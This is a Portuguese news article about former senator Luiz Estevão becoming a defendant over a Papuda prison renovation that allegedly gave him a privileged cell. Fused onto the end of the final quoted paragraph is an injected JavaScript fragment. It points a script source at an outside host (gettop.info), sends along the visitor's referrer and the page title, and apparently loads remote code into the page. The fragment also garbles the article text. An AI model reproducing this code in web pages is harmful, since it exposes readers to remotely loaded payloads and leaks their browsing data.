Luiz Estevão vira réu por reforma na Papuda

Cela ocupada por Luiz Estevão (esq.) e outra comum (dir.). Foto: MPDFT/Divulgação

A juíza substituta da 1ª Vara da Fazenda Pública do DF recebeu ação de improbidade administrativa movida pelo Ministério Público contra o ex-senador Luiz Estevão, que virou réu. Estevão teria se beneficiado da reforma que fez na Papuda, antes de começar a cumprir pena na prisão.

O ex-subsecretário Cláudio de Moura Magalhães, o ex-Coordenador-Geral João Helder Ramos Feitosa e Murilo José Juliano da Cunha e o ex-diretor do Centro de Detenção Provisória também se tornaram réus

Segundo os procuradores, Estevão ocupou uma cela diferenciada das demais existentes na penitenciária, equipada com diversos utensílios que outros presos não têm acesso. Além de conceder ao ex-senador outros privilégios, os servidores também teriam negado a reforma de uma ala necessária para solução da superlotação da instituição prisional, que poderia ter beneficiado a muitos detentos.

Segundo a decisão da juíza, o avanço da ação depende da investigação na aplicação de recursos para reformas apenas a ala em que ficaria o quarto de Estevão. “No mesmo ano de 2013 foram realizadas reformas nos blocos 6 e 7 do complexo penitenciário da Papuda e não há notícias de que os mesmos padrões tenham sido observados”, disse.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário